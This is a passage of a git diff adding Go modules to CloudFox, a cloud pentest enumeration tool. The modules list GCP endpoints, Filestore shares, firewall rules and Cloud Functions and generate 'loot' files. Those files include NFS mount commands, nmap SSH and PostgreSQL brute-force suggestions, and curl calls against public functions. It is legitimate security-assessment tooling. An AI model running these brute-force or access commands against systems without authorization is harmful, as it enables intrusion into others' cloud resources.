ep.ProjectID, + }) + } + } + + // Instance IPs table + instanceHeader := []string{ + "Instance", + "Address", + "Zone", + "Status", + "Project", + } + + var instanceBody [][]string + for _, ep := range m.Endpoints { + if ep.ResourceType == "Instance" { + instanceBody = append(instanceBody, []string{ + ep.Name, + ep.Address, + ep.Region, + ep.Status, + ep.ProjectID, + }) + } + } + + // Static IPs table + staticHeader := []string{ + "Name", + "Address", + "Used By", + "Region", + "Status", + "Project", + } + + var staticBody [][]string + for _, ep := range m.Endpoints { + if ep.Type == "Static IP" { + staticBody = append(staticBody, []string{ + ep.Name, + ep.Address, + ep.Resource, + ep.Region, + ep.Status, + ep.ProjectID, + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "endpoints", + Header: endpointsHeader, + Body: endpointsBody, + }, + } + + // Add load balancers table if there are any + if len(lbBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "endpoints-loadbalancers", + Header: lbHeader, + Body: lbBody, + }) + } + + // Add instances table if there are any + if len(instanceBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "endpoints-instances", + Header: instanceHeader, + Body: instanceBody, + }) + logger.InfoM(fmt.Sprintf("[INFO] Found %d instance(s) with external IPs", len(instanceBody)), globals.GCP_ENDPOINTS_MODULE_NAME) + } + + // Add static IPs table if there are any + if len(staticBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "endpoints-static-ips", + Header: staticHeader, + Body: staticBody, + }) + } + + output := EndpointsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ENDPOINTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/filestore.go b/gcp/commands/filestore.go new file mode 100644 index 00000000..f20c4794 --- /dev/null +++ b/gcp/commands/filestore.go @@ -0,0 +1,136 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + filestoreservice "github.com/BishopFox/cloudfox/gcp/services/filestoreService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPFilestoreCommand = &cobra.Command{ + Use: globals.GCP_FILESTORE_MODULE_NAME, + Aliases: []string{"nfs", "files"}, + Short: "Enumerate Filestore NFS instances", + Long: `Enumerate Filestore instances and their file shares.`, + Run: runGCPFilestoreCommand, +} + +type FilestoreModule struct { + gcpinternal.BaseGCPModule + Instances []filestoreservice.FilestoreInstanceInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type FilestoreOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o FilestoreOutput) TableFiles() []internal.TableFile { return o.Table } +func (o FilestoreOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPFilestoreCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_FILESTORE_MODULE_NAME) + if err != nil { + return + } + + module := &FilestoreModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Instances: []filestoreservice.FilestoreInstanceInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *FilestoreModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FILESTORE_MODULE_NAME, m.processProject) + + if len(m.Instances) == 0 { + logger.InfoM("No Filestore instances found", globals.GCP_FILESTORE_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d Filestore instance(s)", len(m.Instances)), globals.GCP_FILESTORE_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *FilestoreModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + svc := filestoreservice.New() + instances, err := svc.ListInstances(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list Filestore instances: %v", err), globals.GCP_FILESTORE_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Instances = append(m.Instances, instances...) + for _, instance := range instances { + m.addToLoot(instance) + } + m.mu.Unlock() +} + +func (m *FilestoreModule) initializeLootFiles() { + m.LootMap["filestore-mounts"] = &internal.LootFile{ + Name: "filestore-mounts", + Contents: "# Filestore NFS Mount Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *FilestoreModule) addToLoot(instance filestoreservice.FilestoreInstanceInfo) { + for _, share := range instance.Shares { + for _, ip := range instance.IPAddresses { + m.LootMap["filestore-mounts"].Contents += fmt.Sprintf( + "# Instance: %s, Share: %s (%dGB)\nmount -t nfs %s:/%s /mnt/%s\n\n", + instance.Name, share.Name, share.CapacityGB, ip, share.Name, share.Name) + } + } +} + +func (m *FilestoreModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{"Name", "Location", "Tier", "Network", "IP", "Shares", "State", "Project"} + + var body [][]string + for _, instance := range m.Instances { + var shareNames []string + for _, share := range instance.Shares { + shareNames = append(shareNames, share.Name) + } + body = append(body, []string{ + instance.Name, + instance.Location, + instance.Tier, + instance.Network, + strings.Join(instance.IPAddresses, ", "), + strings.Join(shareNames, ", "), + instance.State, + instance.ProjectID, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := FilestoreOutput{ + Table: []internal.TableFile{{Name: "filestore", Header: header, Body: body}}, + Loot: lootFiles, + } + + internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) +} diff --git a/gcp/commands/firewall.go b/gcp/commands/firewall.go new file mode 100644 index 00000000..b0187576 --- /dev/null +++ b/gcp/commands/firewall.go @@ -0,0 +1,582 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + NetworkService "github.com/BishopFox/cloudfox/gcp/services/networkService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPFirewallCommand = &cobra.Command{ + Use: globals.GCP_FIREWALL_MODULE_NAME, + Aliases: []string{"fw", "firewall-rules", "network-security"}, + Short: "Enumerate VPC networks and firewall rules with security analysis", + Long: `Enumerate VPC networks, subnets, and firewall rules across projects with security analysis. + +Features: +- Lists all VPC networks and their peering relationships +- Shows all subnets with CIDR ranges and configurations +- Enumerates firewall rules with security risk analysis +- Identifies overly permissive rules (0.0.0.0/0 ingress) +- Detects exposed sensitive ports (SSH, RDP, databases) +- Generates gcloud commands for remediation + +Security Columns: +- Risk: HIGH, MEDIUM, LOW based on exposure analysis +- Direction: INGRESS or EGRESS +- Source: Source IP ranges (0.0.0.0/0 = internet) +- Ports: Allowed ports and protocols +- Issues: Detected security misconfigurations + +Attack Surface: +- 0.0.0.0/0 ingress allows internet access to resources +- All ports allowed means no port restrictions +- No target tags means rule applies to ALL instances +- VPC peering may expose internal resources`, + Run: runGCPFirewallCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type FirewallModule struct { + gcpinternal.BaseGCPModule + + Networks []NetworkService.VPCInfo + Subnets []NetworkService.SubnetInfo + FirewallRules []NetworkService.FirewallRuleInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type FirewallOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o FirewallOutput) TableFiles() []internal.TableFile { return o.Table } +func (o FirewallOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPFirewallCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_FIREWALL_MODULE_NAME) + if err != nil { + return + } + + module := &FirewallModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Networks: []NetworkService.VPCInfo{}, + Subnets: []NetworkService.SubnetInfo{}, + FirewallRules: []NetworkService.FirewallRuleInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *FirewallModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FIREWALL_MODULE_NAME, m.processProject) + + if len(m.FirewallRules) == 0 && len(m.Networks) == 0 { + logger.InfoM("No networks or firewall rules found", globals.GCP_FIREWALL_MODULE_NAME) + return + } + + // Count security issues + highRiskCount := 0 + publicIngressCount := 0 + for _, rule := range m.FirewallRules { + if rule.RiskLevel == "HIGH" { + highRiskCount++ + } + if rule.IsPublicIngress { + publicIngressCount++ + } + } + + // Count peerings + peeringCount := 0 + for _, network := range m.Networks { + peeringCount += len(network.Peerings) + } + + msg := fmt.Sprintf("Found %d network(s), %d subnet(s), %d firewall rule(s)", + len(m.Networks), len(m.Subnets), len(m.FirewallRules)) + if highRiskCount > 0 { + msg += fmt.Sprintf(" [%d HIGH RISK!]", highRiskCount) + } + if publicIngressCount > 0 { + msg += fmt.Sprintf(" [%d public ingress]", publicIngressCount) + } + if peeringCount > 0 { + msg += fmt.Sprintf(" [%d peerings]", peeringCount) + } + logger.SuccessM(msg, globals.GCP_FIREWALL_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *FirewallModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating networks and firewall in project: %s", projectID), globals.GCP_FIREWALL_MODULE_NAME) + } + + ns := NetworkService.New() + + // Get networks + networks, err := ns.Networks(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating networks in project %s: %v", projectID, err), globals.GCP_FIREWALL_MODULE_NAME) + } + } else { + m.mu.Lock() + m.Networks = append(m.Networks, networks...) + for _, network := range networks { + m.addNetworkToLoot(network) + } + m.mu.Unlock() + } + + // Get subnets + subnets, err := ns.Subnets(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating subnets in project %s: %v", projectID, err), globals.GCP_FIREWALL_MODULE_NAME) + } + } else { + m.mu.Lock() + m.Subnets = append(m.Subnets, subnets...) + m.mu.Unlock() + } + + // Get firewall rules + rules, err := ns.FirewallRulesEnhanced(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating firewall rules in project %s: %v", projectID, err), globals.GCP_FIREWALL_MODULE_NAME) + } + } else { + m.mu.Lock() + m.FirewallRules = append(m.FirewallRules, rules...) + for _, rule := range rules { + m.addFirewallRuleToLoot(rule) + } + m.mu.Unlock() + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d network(s), %d subnet(s), %d rule(s) in project %s", + len(networks), len(subnets), len(rules), projectID), globals.GCP_FIREWALL_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *FirewallModule) initializeLootFiles() { + m.LootMap["firewall-gcloud-commands"] = &internal.LootFile{ + Name: "firewall-gcloud-commands", + Contents: "# Firewall gcloud Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["firewall-public-ingress"] = &internal.LootFile{ + Name: "firewall-public-ingress", + Contents: "# PUBLIC INGRESS Firewall Rules (0.0.0.0/0)\n# Generated by CloudFox\n# These rules allow access from the internet!\n\n", + } + m.LootMap["firewall-high-risk"] = &internal.LootFile{ + Name: "firewall-high-risk", + Contents: "# HIGH RISK Firewall Rules\n# Generated by CloudFox\n# These rules have serious security issues\n\n", + } + m.LootMap["firewall-vpc-peerings"] = &internal.LootFile{ + Name: "firewall-vpc-peerings", + Contents: "# VPC Peering Relationships\n# Generated by CloudFox\n# These networks are connected\n\n", + } + m.LootMap["firewall-exploitation"] = &internal.LootFile{ + Name: "firewall-exploitation", + Contents: "# Firewall Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *FirewallModule) addNetworkToLoot(network NetworkService.VPCInfo) { + // gcloud commands + m.LootMap["firewall-gcloud-commands"].Contents += fmt.Sprintf( + "# Network: %s (Project: %s)\n"+ + "gcloud compute networks describe %s --project=%s\n"+ + "gcloud compute networks subnets list --network=%s --project=%s\n"+ + "gcloud compute firewall-rules list --filter=\"network:%s\" --project=%s\n\n", + network.Name, network.ProjectID, + network.Name, network.ProjectID, + network.Name, network.ProjectID, + network.Name, network.ProjectID, + ) + + // VPC peerings + if len(network.Peerings) > 0 { + m.LootMap["firewall-vpc-peerings"].Contents += fmt.Sprintf( + "# Network: %s (Project: %s)\n", + network.Name, network.ProjectID, + ) + for _, peering := range network.Peerings { + m.LootMap["firewall-vpc-peerings"].Contents += fmt.Sprintf( + " Peering: %s\n"+ + " -> Network: %s\n"+ + " -> State: %s\n"+ + " -> Export Routes: %v\n"+ + " -> Import Routes: %v\n", + peering.Name, + peering.Network, + peering.State, + peering.ExportCustomRoutes, + peering.ImportCustomRoutes, + ) + } + m.LootMap["firewall-vpc-peerings"].Contents += "\n" + } +} + +func (m *FirewallModule) addFirewallRuleToLoot(rule NetworkService.FirewallRuleInfo) { + // gcloud commands + m.LootMap["firewall-gcloud-commands"].Contents += fmt.Sprintf( + "# Rule: %s (Project: %s, Network: %s)\n"+ + "gcloud compute firewall-rules describe %s --project=%s\n\n", + rule.Name, rule.ProjectID, rule.Network, + rule.Name, rule.ProjectID, + ) + + // Public ingress rules + if rule.IsPublicIngress && rule.Direction == "INGRESS" { + m.LootMap["firewall-public-ingress"].Contents += fmt.Sprintf( + "# RULE: %s\n"+ + "# Project: %s, Network: %s\n"+ + "# Priority: %d, Disabled: %v\n"+ + "# Source Ranges: %s\n"+ + "# Allowed: %s\n"+ + "# Target Tags: %s\n"+ + "# Target SAs: %s\n", + rule.Name, + rule.ProjectID, rule.Network, + rule.Priority, rule.Disabled, + strings.Join(rule.SourceRanges, ", "), + formatProtocols(rule.AllowedProtocols), + strings.Join(rule.TargetTags, ", "), + strings.Join(rule.TargetSAs, ", "), + ) + if len(rule.SecurityIssues) > 0 { + m.LootMap["firewall-public-ingress"].Contents += "# Issues:\n" + for _, issue := range rule.SecurityIssues { + m.LootMap["firewall-public-ingress"].Contents += fmt.Sprintf("# - %s\n", issue) + } + } + m.LootMap["firewall-public-ingress"].Contents += "\n" + } + + // High risk rules + if rule.RiskLevel == "HIGH" { + m.LootMap["firewall-high-risk"].Contents += fmt.Sprintf( + "# RULE: %s [HIGH RISK]\n"+ + "# Project: %s, Network: %s\n"+ + "# Direction: %s\n"+ + "# Source Ranges: %s\n"+ + "# Allowed: %s\n"+ + "# Issues:\n", + rule.Name, + rule.ProjectID, rule.Network, + rule.Direction, + strings.Join(rule.SourceRanges, ", "), + formatProtocols(rule.AllowedProtocols), + ) + for _, issue := range rule.SecurityIssues { + m.LootMap["firewall-high-risk"].Contents += fmt.Sprintf("# - %s\n", issue) + } + m.LootMap["firewall-high-risk"].Contents += fmt.Sprintf( + "# Remediation:\n"+ + "gcloud compute firewall-rules update %s --source-ranges=\"10.0.0.0/8\" --project=%s\n"+ + "# Or delete if not needed:\n"+ + "gcloud compute firewall-rules delete %s --project=%s\n\n", + rule.Name, rule.ProjectID, + rule.Name, rule.ProjectID, + ) + } + + // Exploitation commands for high/medium risk + if rule.RiskLevel == "HIGH" || rule.RiskLevel == "MEDIUM" { + m.LootMap["firewall-exploitation"].Contents += fmt.Sprintf( + "# Rule: %s (Project: %s) [%s RISK]\n"+ + "# Network: %s\n"+ + "# Source Ranges: %s\n"+ + "# Allowed: %s\n\n", + rule.Name, rule.ProjectID, rule.RiskLevel, + rule.Network, + strings.Join(rule.SourceRanges, ", "), + formatProtocols(rule.AllowedProtocols), + ) + + // Add specific exploitation suggestions based on allowed ports + for proto, ports := range rule.AllowedProtocols { + if proto == "tcp" || proto == "all" { + for _, port := range ports { + switch port { + case "22": + m.LootMap["firewall-exploitation"].Contents += "# SSH brute force / key-based auth:\n# nmap -p 22 --script ssh-brute \n\n" + case "3389": + m.LootMap["firewall-exploitation"].Contents += "# RDP enumeration:\n# nmap -p 3389 --script rdp-enum-encryption \n\n" + case "3306": + m.LootMap["firewall-exploitation"].Contents += "# MySQL enumeration:\n# nmap -p 3306 --script mysql-info \n\n" + case "5432": + m.LootMap["firewall-exploitation"].Contents += "# PostgreSQL enumeration:\n# nmap -p 5432 --script pgsql-brute \n\n" + } + } + if len(ports) == 0 { + m.LootMap["firewall-exploitation"].Contents += "# All TCP ports allowed - full port scan:\n# nmap -p- \n\n" + } + } + } + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Firewall rules table + rulesHeader := []string{ + "Project ID", + "Rule Name", + "Network", + "Direction", + "Priority", + "Source Ranges", + "Allowed", + "Targets", + "Risk", + "Issues", + } + + var rulesBody [][]string + for _, rule := range m.FirewallRules { + // Format source ranges + sources := strings.Join(rule.SourceRanges, ", ") + if len(sources) > 30 { + sources = sources[:27] + "..." + } + + // Format allowed protocols + allowed := formatProtocolsShort(rule.AllowedProtocols) + + // Format targets + targets := "-" + if len(rule.TargetTags) > 0 { + targets = strings.Join(rule.TargetTags, ",") + } else if len(rule.TargetSAs) > 0 { + targets = "SAs:" + fmt.Sprintf("%d", len(rule.TargetSAs)) + } else { + targets = "ALL" + } + if len(targets) > 20 { + targets = targets[:17] + "..." + } + + // Format issues count + issues := "-" + if len(rule.SecurityIssues) > 0 { + issues = fmt.Sprintf("%d issue(s)", len(rule.SecurityIssues)) + } + + rulesBody = append(rulesBody, []string{ + rule.ProjectID, + rule.Name, + rule.Network, + rule.Direction, + fmt.Sprintf("%d", rule.Priority), + sources, + allowed, + targets, + rule.RiskLevel, + issues, + }) + } + + // Networks table + networksHeader := []string{ + "Project ID", + "Network Name", + "Routing Mode", + "Subnets", + "Peerings", + "Auto Subnets", + } + + var networksBody [][]string + for _, network := range m.Networks { + // Count subnets + subnetCount := len(network.Subnetworks) + + // Format peerings + peerings := "-" + if len(network.Peerings) > 0 { + var peerNames []string + for _, p := range network.Peerings { + peerNames = append(peerNames, p.Name) + } + peerings = strings.Join(peerNames, ", ") + if len(peerings) > 30 { + peerings = fmt.Sprintf("%d peering(s)", len(network.Peerings)) + } + } + + // Format auto subnets + autoSubnets := "No" + if network.AutoCreateSubnetworks { + autoSubnets = "Yes" + } + + networksBody = append(networksBody, []string{ + network.ProjectID, + network.Name, + network.RoutingMode, + fmt.Sprintf("%d", subnetCount), + peerings, + autoSubnets, + }) + } + + // Subnets table + subnetsHeader := []string{ + "Project ID", + "Network", + "Subnet Name", + "Region", + "CIDR Range", + "Private Google Access", + } + + var subnetsBody [][]string + for _, subnet := range m.Subnets { + privateAccess := "No" + if subnet.PrivateIPGoogleAccess { + privateAccess = "Yes" + } + + subnetsBody = append(subnetsBody, []string{ + subnet.ProjectID, + subnet.Network, + subnet.Name, + subnet.Region, + subnet.IPCidrRange, + privateAccess, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{} + + if len(rulesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FIREWALL_MODULE_NAME + "-rules", + Header: rulesHeader, + Body: rulesBody, + }) + } + + if len(networksBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FIREWALL_MODULE_NAME + "-networks", + Header: networksHeader, + Body: networksBody, + }) + } + + if len(subnetsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FIREWALL_MODULE_NAME + "-subnets", + Header: subnetsHeader, + Body: subnetsBody, + }) + } + + output := FirewallOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_FIREWALL_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// formatProtocols formats allowed/denied protocols for display +func formatProtocols(protocols map[string][]string) string { + var parts []string + for proto, ports := range protocols { + if len(ports) == 0 { + parts = append(parts, proto+":all") + } else { + parts = append(parts, proto+":"+strings.Join(ports, ",")) + } + } + return strings.Join(parts, "; ") +} + +// formatProtocolsShort formats protocols for table display +func formatProtocolsShort(protocols map[string][]string) string { + var parts []string + for proto, ports := range protocols { + if len(ports) == 0 { + parts = append(parts, proto+":*") + } else if len(ports) > 3 { + parts = append(parts, fmt.Sprintf("%s:%d ports", proto, len(ports))) + } else { + parts = append(parts, proto+":"+strings.Join(ports, ",")) + } + } + result := strings.Join(parts, " ") + if len(result) > 25 { + return result[:22] + "..." + } + return result +} diff --git a/gcp/commands/functions.go b/gcp/commands/functions.go new file mode 100644 index 00000000..ceefc550 --- /dev/null +++ b/gcp/commands/functions.go @@ -0,0 +1,595 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + FunctionsService "github.com/BishopFox/cloudfox/gcp/services/functionsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPFunctionsCommand = &cobra.Command{ + Use: globals.GCP_FUNCTIONS_MODULE_NAME, + Aliases: []string{"function", "gcf", "cloud-functions"}, + Short: "Enumerate GCP Cloud Functions with security analysis", + Long: `Enumerate GCP Cloud Functions across projects with security-relevant details. + +Features: +- Lists all Cloud Functions (Gen 2) accessible to the authenticated user +- Shows security configuration (ingress settings, VPC connector, service account) +- Identifies publicly invokable functions (allUsers/allAuthenticatedUsers) +- Shows runtime, trigger type, and trigger configuration +- Counts environment variables and secret references +- Generates gcloud commands for further enumeration and exploitation + +Security Columns: +- Ingress: ALL_TRAFFIC (public), INTERNAL_ONLY, or INTERNAL_AND_GCLB +- Public: Whether allUsers or allAuthenticatedUsers can invoke the function +- ServiceAccount: The identity the function runs as (privilege level) +- VPCConnector: Network connectivity to VPC resources +- Secrets: Count of secret environment variables and volumes + +Attack Surface: +- Public HTTP functions may be directly exploitable +- Functions with default service account may have excessive permissions +- Functions with VPC connectors can access internal resources +- Event triggers reveal integration points (Pub/Sub, Storage, etc.)`, + Run: runGCPFunctionsCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type FunctionsModule struct { + gcpinternal.BaseGCPModule + + Functions []FunctionsService.FunctionInfo + SecurityAnalysis []FunctionsService.FunctionSecurityAnalysis + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type FunctionsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o FunctionsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o FunctionsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPFunctionsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_FUNCTIONS_MODULE_NAME) + if err != nil { + return + } + + module := &FunctionsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Functions: []FunctionsService.FunctionInfo{}, + SecurityAnalysis: []FunctionsService.FunctionSecurityAnalysis{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *FunctionsModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FUNCTIONS_MODULE_NAME, m.processProject) + + if len(m.Functions) == 0 { + logger.InfoM("No Cloud Functions found", globals.GCP_FUNCTIONS_MODULE_NAME) + return + } + + // Count public functions + publicCount := 0 + for _, fn := range m.Functions { + if fn.IsPublic { + publicCount++ + } + } + + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d function(s), %d PUBLIC", len(m.Functions), publicCount), globals.GCP_FUNCTIONS_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d function(s)", len(m.Functions)), globals.GCP_FUNCTIONS_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *FunctionsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud Functions in project: %s", projectID), globals.GCP_FUNCTIONS_MODULE_NAME) + } + + fs := FunctionsService.New() + functions, err := fs.Functions(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating functions in project %s: %v", projectID, err), globals.GCP_FUNCTIONS_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Functions = append(m.Functions, functions...) + + for _, fn := range functions { + m.addFunctionToLoot(fn) + // Perform security analysis + analysis := fs.AnalyzeFunctionSecurity(fn) + m.SecurityAnalysis = append(m.SecurityAnalysis, analysis) + m.addSecurityAnalysisToLoot(analysis, fn) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d function(s) in project %s", len(functions), projectID), globals.GCP_FUNCTIONS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *FunctionsModule) initializeLootFiles() { + m.LootMap["functions-gcloud-commands"] = &internal.LootFile{ + Name: "functions-gcloud-commands", + Contents: "# GCP Cloud Functions Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["functions-exploitation"] = &internal.LootFile{ + Name: "functions-exploitation", + Contents: "# GCP Cloud Functions Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["functions-public"] = &internal.LootFile{ + Name: "functions-public", + Contents: "# PUBLIC GCP Cloud Functions\n# Generated by CloudFox\n# These functions can be invoked by allUsers or allAuthenticatedUsers!\n\n", + } + m.LootMap["functions-http-endpoints"] = &internal.LootFile{ + Name: "functions-http-endpoints", + Contents: "# GCP Cloud Functions HTTP Endpoints\n# Generated by CloudFox\n\n", + } + // Pentest-focused loot files + m.LootMap["functions-security-analysis"] = &internal.LootFile{ + Name: "functions-security-analysis", + Contents: "# Cloud Functions Security Analysis\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["functions-source-locations"] = &internal.LootFile{ + Name: "functions-source-locations", + Contents: "# Cloud Functions Source Code Locations\n# Generated by CloudFox\n# Download and review for hardcoded secrets\n\n", + } + m.LootMap["functions-env-vars"] = &internal.LootFile{ + Name: "functions-env-vars", + Contents: "# Cloud Functions Environment Variables\n# Generated by CloudFox\n# Variable names that may hint at secrets\n\n", + } + m.LootMap["functions-secrets"] = &internal.LootFile{ + Name: "functions-secrets", + Contents: "# Cloud Functions Secret References\n# Generated by CloudFox\n# Secrets used by functions (names only)\n\n", + } +} + +func (m *FunctionsModule) addFunctionToLoot(fn FunctionsService.FunctionInfo) { + // gcloud commands + m.LootMap["functions-gcloud-commands"].Contents += fmt.Sprintf( + "# Function: %s (Project: %s, Region: %s)\n"+ + "gcloud functions describe %s --region=%s --project=%s --gen2\n"+ + "gcloud functions get-iam-policy %s --region=%s --project=%s --gen2\n"+ + "gcloud functions logs read %s --region=%s --project=%s --gen2 --limit=50\n\n", + fn.Name, fn.ProjectID, fn.Region, + fn.Name, fn.Region, fn.ProjectID, + fn.Name, fn.Region, fn.ProjectID, + fn.Name, fn.Region, fn.ProjectID, + ) + + // Exploitation commands + if fn.TriggerType == "HTTP" && fn.TriggerURL != "" { + m.LootMap["functions-exploitation"].Contents += fmt.Sprintf( + "# Function: %s (Project: %s)\n"+ + "# Ingress: %s, Service Account: %s\n"+ + "# Test invocation (GET):\n"+ + "curl -s '%s'\n"+ + "# Test invocation (POST with auth):\n"+ + "curl -s -X POST '%s' \\\n"+ + " -H 'Authorization: Bearer $(gcloud auth print-identity-token)' \\\n"+ + " -H 'Content-Type: application/json' \\\n"+ + " -d '{\"test\": \"data\"}'\n\n", + fn.Name, fn.ProjectID, + fn.IngressSettings, 